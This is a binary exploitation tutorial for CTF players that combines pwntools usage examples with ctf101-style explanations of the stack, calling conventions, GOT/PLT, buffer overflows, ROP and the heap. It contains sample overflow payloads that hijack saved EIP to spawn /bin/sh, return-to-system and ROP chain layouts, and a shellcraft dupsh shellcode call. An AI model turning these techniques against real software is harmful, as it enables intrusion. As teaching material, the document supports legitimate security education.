>>> leet = unhex('37130000')
>>> u32(b'abcd') == struct.unpack('I', b'abcd')[0]
True
The packing/unpacking operations are defined for many common bit-widths.
>>> u8(b'A') == 0x41
True
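For comparison, here is a rough standard-library sketch of what these helpers do. The names p32_sketch and u32_sketch are hypothetical stand-ins rather than pwntools functions, and the sketch assumes little-endian byte order, which is the pwntools default when context has not been changed.

```python
import struct

def p32_sketch(value: int) -> bytes:
    """Pack an unsigned 32-bit integer as 4 little-endian bytes."""
    return struct.pack("<I", value)

def u32_sketch(data: bytes) -> int:
    """Unpack 4 little-endian bytes into an unsigned 32-bit integer."""
    return struct.unpack("<I", data)[0]

packed = p32_sketch(0xdeadbeef)
print(packed.hex())              # least significant byte comes first
print(hex(u32_sketch(b"abcd")))  # 'a' (0x61) ends up as the low byte
```

The explicit "<" in the format string pins the byte order, whereas the bare 'I' used in the comparison above follows the byte order of the machine running Python.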
Setting the Target Architecture and OS
The target architecture can generally be specified as an argument to the routine that requires it.
>>> asm('nop')
b'\x90'
>>> asm('nop', arch='arm')
b'\x00\xf0 \xe3'
However, it can also be set once in the global context. The operating system, word size, and endianness can also be set here.
>>> context.arch = 'i386'
>>> context.os = 'linux'
>>> context.endian = 'little'
>>> context.word_size = 32
Additionally, you can use a shorthand to set all of the values at once.
>>> asm('nop')
b'\x90'
>>> context(arch='arm', os='linux', endian='big', word_size=32)
>>> asm('nop')
b'\xe3 \xf0\x00'
Setting Logging Verbosity
You can control the verbosity of the standard pwntools logging via context.
For example, setting
>>> context.log_level = 'debug'
will cause all of the data sent and received by a tube to be printed on the screen.
Assembly and Disassembly
Never again will you need to run some already-assembled pile of shellcode from the internet! The pwnlib.asm module is full of awesome.
>>> enhex(asm('mov eax, 0'))
'b800000000'
But if you do, it’s easy to suss out!
>>> print(disasm(unhex('6a0258cd80ebf9')))
0: 6a 02 push 0x2
2: 58 pop eax
3: cd 80 int 0x80
5: eb f9 jmp 0x0
However, you shouldn't even need to write your own shellcode most of the time! pwntools comes with the pwnlib.shellcraft module, which is loaded with useful time-saving shellcodes.
Let’s say that we want to setreuid(getuid(), getuid()) followed by duping file descriptor 4 to stdin, stdout, and stderr, and then pop a shell!
>>> enhex(asm(shellcraft.setreuid() + shellcraft.dupsh(4))) # doctest: +ELLIPSIS
'6a3158cd80...'
Misc Tools
Never write another hexdump, thanks to pwnlib.util.fiddling.
Find offsets in your buffer that cause a crash, thanks to pwnlib.cyclic.
>>> cyclic(20)
b'aaaabaaacaaadaaaeaaa'
>>> # Assume EIP = 0x62616166 (b'faab' which is pack(0x62616166)) at crash time
>>> cyclic_find(b'faab')
120
ELF Manipulation
Stop hard-coding things! Look them up at runtime with pwnlib.elf.
>>> e = ELF('/bin/cat')
>>> print(hex(e.address)) #doctest: +SKIP
0x400000
>>> print(hex(e.symbols['write'])) #doctest: +SKIP
0x401680
>>> print(hex(e.got['write'])) #doctest: +SKIP
0x60b070
>>> print(hex(e.plt['write'])) #doctest: +SKIP
0x401680
You can even patch and save the files.
>>> e = ELF('/bin/cat')
>>> e.read(e.address, 4)
b'\x7fELF'
>>> e.asm(e.address, 'ret')
>>> e.save('/tmp/quiet-cat')
>>> disasm(open('/tmp/quiet-cat','rb').read(1))
' 0: c3 ret'
Binary Exploitation
https://ctf101.org/binary-exploitation/overview/
Binaries, or executables, are files of machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security that really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modify the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
- Registers
- The Stack
- Calling Conventions
- Global Offset Table (GOT)
- Buffers
- Buffer Overflow
- Return Oriented Programming (ROP)
- Binary Security
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Stack Canaries
- Relocation Read-Only (RELRO)
- The Heap
- Heap Exploitation
- Format String Vulnerability
Registers
A register is a location within the processor that is able to store data, much like RAM. Unlike RAM, however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not "general purpose registers" (GPRs). On 64-bit x86, the only 2 reserved registers are rip and rsp, which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different-sized accesses for backward compatibility. For example, the rax register is the full 64-bit register, eax is the low 32 bits of rax, ax is the low 16 bits, al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-15 of rax).
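The relationship between these sub-registers can be sketched with plain bit masks. This only illustrates which bits each name refers to; the value placed in rax is arbitrary.

```python
rax = 0x1122334455667788      # arbitrary example value

eax = rax & 0xFFFFFFFF        # low 32 bits of rax
ax = rax & 0xFFFF             # low 16 bits
al = rax & 0xFF               # low 8 bits
ah = (rax >> 8) & 0xFF        # bits 8-15, the high byte of ax

for name, value in [("rax", rax), ("eax", eax), ("ax", ax), ("al", al), ("ah", ah)]:
    print(f"{name} = {value:#x}")
```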
The Stack
In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp/rsp register holds the address in memory where the bottom of the stack resides, that is, the lowest address currently in use, where the most recently pushed value is stored. When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory. Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).
N.B. The stack "grows" down to lower memory addresses!
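The push and pop behaviour described above can be modelled in a few lines. This is a toy sketch of a 32-bit stack, not an emulator; the ToyStack class and its starting address are made up for illustration.

```python
import struct

class ToyStack:
    """A toy model of a 32-bit x86 stack (hypothetical helper, not a real emulator)."""

    def __init__(self, top=0xffff0000, size=0x100):
        self.base = top - size      # lowest address backed by memory
        self.mem = bytearray(size)
        self.esp = top              # empty stack: esp sits just above the memory

    def push(self, value):
        self.esp -= 4               # esp moves down first...
        off = self.esp - self.base
        self.mem[off:off + 4] = struct.pack("<I", value)   # ...then the value is stored

    def pop(self):
        off = self.esp - self.base
        value = struct.unpack("<I", self.mem[off:off + 4])[0]  # read the value at esp
        self.esp += 4               # then esp moves back up
        return value

stack = ToyStack()
stack.push(0x41414141)
stack.push(0x42424242)
print(hex(stack.esp))    # two pushes moved esp down by 8
print(hex(stack.pop()))  # last value pushed is the first one popped
```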
Conventionally, ebp/rbp contains the address of the top of the current stack frame (its highest address), and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp. A stack frame is essentially just the space used on the stack by a given function.
Uses
The stack is primarily used for a few things:
- Storing function arguments
- Storing local variables
- Storing processor state between function calls
Example
Let's see what the stack looks like right after say_hi has been called in this 32-bit x86 C program:
#include <stdio.h>
void say_hi(const char * name) {
printf("Hello %s!\n", name);
}
int main(int argc, char ** argv) {
char * name;
if (argc != 2) {
return 1;
}
name = argv[1];
say_hi(name);
return 0;
}
And the relevant assembly:
0804840b <say_hi>:
804840b: 55 push ebp
804840c: 89 e5 mov ebp,esp
804840e: 83 ec 08 sub esp,0x8
8048411: 83 ec 08 sub esp,0x8
8048414: ff 75 08 push DWORD PTR [ebp+0x8]
8048417: 68 f0 84 04 08 push 0x80484f0
804841c: e8 bf fe ff ff call 80482e0 <printf@plt>
8048421: 83 c4 10 add esp,0x10
8048424: 90 nop
8048425: c9 leave
8048426: c3 ret
08048427 <main>:
8048427: 8d 4c 24 04 lea ecx,[esp+0x4]
804842b: 83 e4 f0 and esp,0xfffffff0
804842e: ff 71 fc push DWORD PTR [ecx-0x4]
8048431: 55 push ebp
8048432: 89 e5 mov ebp,esp
8048434: 51 push ecx
8048435: 83 ec 14 sub esp,0x14
8048438: 89 c8 mov eax,ecx
804843a: 83 38 02 cmp DWORD PTR [eax],0x2
804843d: 74 07 je 8048446 <main+0x1f>
804843f: b8 01 00 00 00 mov eax,0x1
8048444: eb 1c jmp 8048462 <main+0x3b>
8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]
8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]
804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax
804844f: 83 ec 0c sub esp,0xc
8048452: ff 75 f4 push DWORD PTR [ebp-0xc]
8048455: e8 b1 ff ff ff call 804840b <say_hi>
804845a: 83 c4 10 add esp,0x10
804845d: b8 00 00 00 00 mov eax,0x0
8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
8048465: c9 leave
8048466: 8d 61 fc lea esp,[ecx-0x4]
8048469: c3 ret
Skipping over the bulk of main, you'll see that at 0x8048452 main's name local is pushed to the stack because it's the first argument to say_hi. Then, a call instruction is executed. call instructions first push the address of the instruction that follows them (the return address) to the stack, then jump to their destination. So when the processor begins executing say_hi at 0x0804840b, the stack looks like this:
EIP = 0x0804840b (push ebp)
ESP = 0xffff0000
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
ESP -> 0xffff0000: 0x0804845a // Return address for say_hi
The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)
ESP = 0xfffefffc
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
ESP -> 0xfffefffc: 0xffff002c // Saved EBP
Again, note how esp gets smaller when values are pushed to the stack.
Next, the current esp is saved into ebp, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)
ESP = 0xfffefffc
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
ESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP
Then, the stack is "grown" to accommodate local variables inside say_hi.
EIP = 0x08048414 (push [ebp + 0x8])
ESP = 0xfffeffec
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
ESP -> 0xfffeffec: UNDEFINED
NOTE: stack space is not implicitly cleared!
Now, the 2 arguments to printf are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)
ESP = 0xfffeffe4
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
0xfffeffec: UNDEFINED
0xfffeffe8: 0xffffa0a0 // printf argument 2
ESP -> 0xfffeffe4: 0x080484f0 // printf argument 1
Finally, printf is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0
ESP = 0xfffeffe0
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
0xfffeffec: UNDEFINED
0xfffeffe8: 0xffffa0a0 // printf argument 2
0xfffeffe4: 0x080484f0 // printf argument 1
ESP -> 0xfffeffe0: 0x08048421 // Return address for printf
Once printf has returned, the leave instruction moves ebp into esp, and pops the saved EBP.
EIP = 0x08048426 (ret)
ESP = 0xffff0000
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
ESP -> 0xffff0000: 0x0804845a // Return address for say_hi
And finally, ret pops the saved instruction pointer into eip, which causes the program to return to main with the same esp, ebp, and stack contents as when say_hi was initially called.
EIP = 0x0804845a (add esp, 0x10)
ESP = 0xffff0004
EBP = 0xffff002c
ESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1
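The whole walkthrough can be replayed with a small register-and-memory model. This is a hand-written sketch that mirrors the instructions of say_hi one by one; it assumes the starting register values from the diagrams and does not execute any real machine code.

```python
mem = {}                                   # address -> 32-bit value
regs = {"esp": 0xffff0004, "ebp": 0xffff002c}
mem[0xffff0004] = 0xffffa0a0               # say_hi argument 1, already pushed by main

def push(value):
    regs["esp"] -= 4
    mem[regs["esp"]] = value

def pop():
    value = mem[regs["esp"]]
    regs["esp"] += 4
    return value

trace = []
def record(step):
    trace.append((step, regs["esp"], regs["ebp"]))

push(0x0804845a); record("call say_hi")            # return address into main
push(regs["ebp"]); record("push ebp")              # save main's ebp
regs["ebp"] = regs["esp"]; record("mov ebp, esp")
regs["esp"] -= 0x10; record("sub esp, 0x8 (twice)")
push(mem[regs["ebp"] + 8]); push(0x080484f0); record("push printf arguments")
push(0x08048421); record("call printf")            # return address into say_hi
pop(); record("printf returns")
regs["esp"] += 0x10; record("add esp, 0x10")
regs["esp"] = regs["ebp"]; regs["ebp"] = pop(); record("leave")
eip = pop(); record("ret")

for step, esp, ebp in trace:
    print(f"{step:24} esp={esp:#010x} ebp={ebp:#010x}")
```

Printing the trace gives one line per step, which makes it easy to compare esp and ebp against each diagram.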
Calling Conventions
To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However, in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked into programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit.
cdecl
In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {
return a + b + c;
}
would be invoked by pushing c, then b, then a.
SysV
For 64-bit binaries, function arguments are first passed in certain registers:
- RDI
- RSI
- RDX
- RCX
- R8
- R9
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
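The register-then-stack rule can be sketched as a small helper. The function place_arguments is hypothetical and only covers integer or pointer arguments; floating-point and struct arguments follow additional rules that are not modelled here.

```python
SYSV_INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_arguments(args):
    """Return (register assignments, leftover values in the order they are pushed)."""
    in_regs = dict(zip(SYSV_INT_REGS, args))   # first six go in registers
    leftover = args[len(SYSV_INT_REGS):]
    pushes = list(reversed(leftover))          # last argument is pushed first
    return in_regs, pushes

regs, pushes = place_arguments([1, 2, 3, 4, 5, 6, 7, 8])
print(regs)     # arguments 1-6 mapped to rdi, rsi, rdx, rcx, r8, r9
print(pushes)   # arguments 7 and 8, pushed in reverse order
```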
Other Conventions
Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
GOT
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use, in order to reduce binary size. Instead, common functions (like those in libc) are "linked" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of a function to its address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch; however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts won't be resolved to an address in libc until the first time it is called:
int main() {
puts("Hi there!");
puts("Ok bye now.");
return 0;
}
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls "short circuit" straight to their implementation bypassing the dynamic resolver.
This has two important implications:
- The GOT contains pointers to libraries which move around due to ASLR
- The GOT is writable
These two facts will become very useful in Return Oriented Programming.
PLT
Before the address of a function has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small "stub" function that is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
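Lazy binding can be pictured with a dictionary standing in for the GOT. This is a conceptual sketch only: the libc address is invented, and the real dynamic linker works with relocation entries rather than Python callables.

```python
LIBC = {"puts": 0xf7e5f000}     # hypothetical address of puts inside libc
resolver_calls = []             # records every trip through the resolver

def plt_stub(name):
    """Stand-in for a PLT stub: ask the dynamic linker to resolve `name`."""
    resolver_calls.append(name)
    got[name] = LIBC[name]      # the lookup result is cached in the GOT
    return got[name]

# Before the first call, each GOT slot points back at its PLT stub.
got = {"puts": plt_stub}

def call(name):
    """Call through the GOT, as compiled code does for an imported function."""
    target = got[name]
    if callable(target):        # slot is still unresolved
        target = target(name)
    return target               # address that execution would jump to

first = call("puts")
second = call("puts")
print(hex(first), hex(second), resolver_calls)
```

The second call never reaches the resolver because the GOT slot was overwritten during the first call, which is also why the GOT has to be writable under lazy binding.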
Buffers
A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name would be considered a stack buffer:
#include <stdio.h>
#include <unistd.h> // for read
int main() {
char name[64] = {0};
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Buffers could also be global variables:
#include <stdio.h>
#include <unistd.h> // for read
char name[64] = {0};
int main() {
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Or dynamically allocated on the heap:
#include <stdio.h>
#include <stdlib.h>
#include <string.h> // for memset
#include <unistd.h> // for read
int main() {
char *name = malloc(64);
memset(name, 0, 64);
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Exploits
Given that buffers commonly hold user input, mistakes when writing to them could result in attacker-controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
Buffer Overflow
A Buffer Overflow is a vulnerability in which data can be written that exceeds the allocated space, allowing an attacker to overwrite other data.
Stack buffer overflow
The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>
#include <unistd.h> // for read
int main() {
int secret = 0xdeadbeef;
char name[100] = {0};
read(0, name, 0x100);
if (secret == 0x1337) {
puts("Wow! Here's a secret.");
} else {
puts("I guess you're not cool enough to see my secret");
}
}
There's a tiny mistake in this program which will allow us to see the secret. name is decimal 100 bytes, however, we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to lay out the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x0
ESP -> 0xffff0000: 0x0 // name
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
However, when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbe41 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The least significant byte of the secret has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of the secret is "clobbered" with our 'A's:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0x41414141 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The remaining 152 bytes would continue clobbering values up the stack.
Passing an impossible check
How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite the secret happen to be the bytes that represent 0x1337 in little-endian, we'll see the secret message.
A small Python one-liner will work nicely: python3 -c "import sys; sys.stdout.buffer.write(b'A'*100 + b'\x37\x13\x00\x00')"
This will fill the name buffer with 100 'A's, then overwrite the secret with the 32-bit little-endian encoding of 0x1337.
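To check the byte order, the overflow can be replayed against a byte-level model of the frame. This is a sketch that assumes the stack layout from the diagrams above (name, then secret, saved EBP, saved EIP); a real compiler may lay things out differently.

```python
import struct

NAME_SIZE = 100

# Model the frame from the diagrams: name[100], then secret, saved EBP, saved EIP.
frame = bytearray(NAME_SIZE) + struct.pack("<III", 0xdeadbeef, 0xffff0100, 0xf7f7f7f7)

payload = b"A" * NAME_SIZE + struct.pack("<I", 0x1337)

# read(0, name, 0x100) copies the input starting at name[0], past the end of name.
frame[:len(payload)] = payload

secret = struct.unpack_from("<I", frame, NAME_SIZE)[0]
print(payload[-4:].hex())   # bytes as they sit in memory, low byte first
print(hex(secret))          # value the program sees when it compares secret
```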
Going one step further
As discussed on the stack page, the address that the current function should jump to when it is done is also saved on the stack (denoted as "Saved EIP" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called "popping a shell") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this, defined somewhere else in the program, that we normally can't get to:
void give_shell() {
system("/bin/sh");
}
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack with the address of give_shell. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell, and giving us our shell.
Assuming give_shell is at 0x08048fd0, we could use something like this: python3 -c "import sys; sys.stdout.buffer.write(b'A'*108 + b'\xd0\x8f\x04\x08')"
We send 108 'A's to overwrite the 100 bytes that are allocated for name, the 4 bytes for secret, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell's address, and we would get a shell!
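The same payload can be built and checked programmatically. This sketch assumes the frame layout from the earlier diagrams and the give_shell address used in the text; on a real target both would need to be confirmed with a debugger.

```python
import struct

GIVE_SHELL = 0x08048fd0     # address assumed in the text above
PADDING = 100 + 4 + 4       # name + secret + saved EBP

payload = b"A" * PADDING + struct.pack("<I", GIVE_SHELL)

# Same frame model as the stack diagrams: name, secret, saved EBP, saved EIP.
frame = bytearray(100) + struct.pack("<III", 0xdeadbeef, 0xffff0100, 0xf7f7f7f7)
frame[:len(payload)] = payload

saved_eip = struct.unpack_from("<I", frame, PADDING)[0]
print(len(payload), hex(saved_eip))   # payload length and the overwritten saved EIP
```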
This idea is extended in Return Oriented Programming.
Return Oriented Programming
Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function, however, so we need to find a way to manually invoke system or another exec function to get us our shell.
32 bit
Imagine we have a program similar to the following:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> // for read
char name[32];
int main() {
printf("What's your name? ");
read(0, name, 32);
printf("Hi %s\n", name);
printf("The time is currently ");
system("/bin/date");
char echo[100];
printf("What do you want me to echo back? ");
read(0, echo, 1000);
puts(echo);
return 0;
}
We obviously have a stack buffer overflow on the echo variable which can give us EIP control when main returns. But we don't have a give_shell function! So what can we do?
We can call system with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When main returns, we want our stack to look as if something had called system normally. Recall what is on the stack after a function has been called:
... // More arguments
0xffff0008: 0x00000002 // Argument 2
0xffff0004: 0x00000001 // Argument 1
ESP -> 0xffff0000: 0x080484d0 // Return address
So main's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1
0xffff0004: 0xdeadbeef // return address for system
ESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)
Then when main returns, it will jump into system's PLT entry and the stack will appear just as if system had been called normally for the first time.
Note: we don't care about the return address system will return to because we will have already gotten our shell by then!
Arguments
This is a good start, but we need to pass an argument to system for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries "move around" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case, however, we have a very convenient name global which will be at a known location in the binary (in the BSS segment).
Putting it together
Our exploit will need to do the following:
- Enter "sh" or another command to run as the name
- Fill the stack with
  - Garbage up to the saved EIP
  - The address of system's PLT entry
  - A fake return address for system to jump to when it's done
  - The address of the name global to act as the first argument to system
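The steps above can be sketched as two inputs. Everything numeric here is an assumption for illustration: SYSTEM_PLT is taken from the diagram above, while NAME_ADDR and OFFSET_TO_EIP are hypothetical and would have to be measured for the real binary. The p32 helper is defined locally and simply mirrors the pwntools function of the same name.

```python
import struct

def p32(value):
    """Local helper: pack a 32-bit little-endian value."""
    return struct.pack("<I", value)

SYSTEM_PLT = 0x08048450     # system's PLT entry, as in the diagram above
NAME_ADDR = 0x0804a040      # hypothetical address of the global `name`
OFFSET_TO_EIP = 112         # hypothetical distance from echo[0] to the saved EIP

first_input = b"sh\x00"     # stored in `name`, later used as system's argument

second_input = (
    b"A" * OFFSET_TO_EIP    # garbage up to the saved EIP
    + p32(SYSTEM_PLT)       # main returns into system
    + p32(0xdeadbeef)       # fake return address for system
    + p32(NAME_ADDR)        # first argument: pointer to "sh"
)
print(len(second_input))
```

In practice the offset is usually found by crashing the program with a cyclic pattern and looking up the value that lands in EIP.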
64 bit
In 64-bit binaries, we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called "gadgets." These gadgets usually pop one or more registers off of the stack, and then execute ret, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret
0x400c03: pop rsi; pop r15; ret
We can set up a fake call stack with these gadgets to sequentially execute them, popping values we control into registers, and then end with a jump to system.
Example
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
0xffff0008: 0xdeadbeef // value to be popped into rdi
RSP -> 0xffff0000: 0x400c01 // address of rdi gadget
Stepping through this one instruction at a time, main returns, jumping to our pop rdi gadget:
RIP = 0x400c01 (pop rdi)
RDI = UNKNOWN
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
RSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi
pop rdi is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)
RDI = 0xdeadbeef
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
0xffff0018: 0x1337beef // value we want in rsi
RSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget
The RDI gadget then rets into our RSI gadget:
RIP = 0x400c03 (pop rsi)
RDI = 0xdeadbeef
RSI = UNKNOWN
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
0xffff0020: 0x1337beef // value we want in r15 (probably garbage)
RSP -> 0xffff0018: 0x1337beef // value we want in rsi
RSI and R15 are popped:
RIP = 0x400c06 (ret)
RDI = 0xdeadbeef
RSI = 0x1337beef
RSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled
And finally, the RSI gadget rets, jumping to whatever function we want, but now with RDI and RSI set to values we control.
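The fake call stack can be built as bytes and then replayed with a toy interpreter. The gadget addresses and values are the ones from the example above; the GADGETS table is a hand-written description of what each gadget pops, not something read from a real binary.

```python
import struct

POP_RDI = 0x400c01          # pop rdi; ret
POP_RSI_R15 = 0x400c03      # pop rsi; pop r15; ret
TARGET = 0x400d00           # function to reach once the registers are set

chain_words = [
    POP_RDI, 0xdeadbeef,                  # rdi = 0xdeadbeef
    POP_RSI_R15, 0x1337beef, 0x1337beef,  # rsi = 0x1337beef, r15 = filler
    TARGET,
]
chain = b"".join(struct.pack("<Q", word) for word in chain_words)

# Toy interpreter: which registers does each gadget pop before its ret?
GADGETS = {POP_RDI: ["rdi"], POP_RSI_R15: ["rsi", "r15"]}

words = list(struct.unpack(f"<{len(chain) // 8}Q", chain))
regs = {}
rip = words.pop(0)                        # main's ret pops the first entry
while rip in GADGETS:
    for reg in GADGETS[rip]:
        regs[reg] = words.pop(0)          # each pop consumes one stack slot
    rip = words.pop(0)                    # the gadget's ret

print(hex(rip), {name: hex(value) for name, value in regs.items()})
```

In a real exploit, chain would be appended to the padding that reaches the saved RIP, just as the 32-bit payload was.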
Binary Security
Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Relocation Read-Only (RELRO)
- Stack Canaries/Cookies
The Heap
A heap is a place in memory that a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
- Heap allocations can be dynamically sized
- Heap allocations "persist" when a function returns
There are also some disadvantages, however:
- Heap allocations can be slower
- Heap allocations must be manually cleaned up
Using the heap
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
- malloc: allocate n bytes on the heap
- free: free the given allocation
Let's see how these could be used in a program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h> // for memset
#include <unistd.h> // for read
int main() {
unsigned alloc_size = 0;
char *stuff;
printf("Number of bytes? ");
scanf("%u", &alloc_size);
stuff = malloc(alloc_size + 1);
memset(stuff, 0, alloc_size + 1); // zero the buffer: destination first, then fill value
read(0, stuff, alloc_size);
printf("You wrote: %s", stuff);
free(stuff);
return 0;
}
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
Heap Exploits
Overflow
Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide a new attack surface.
Use After Free (UAF)
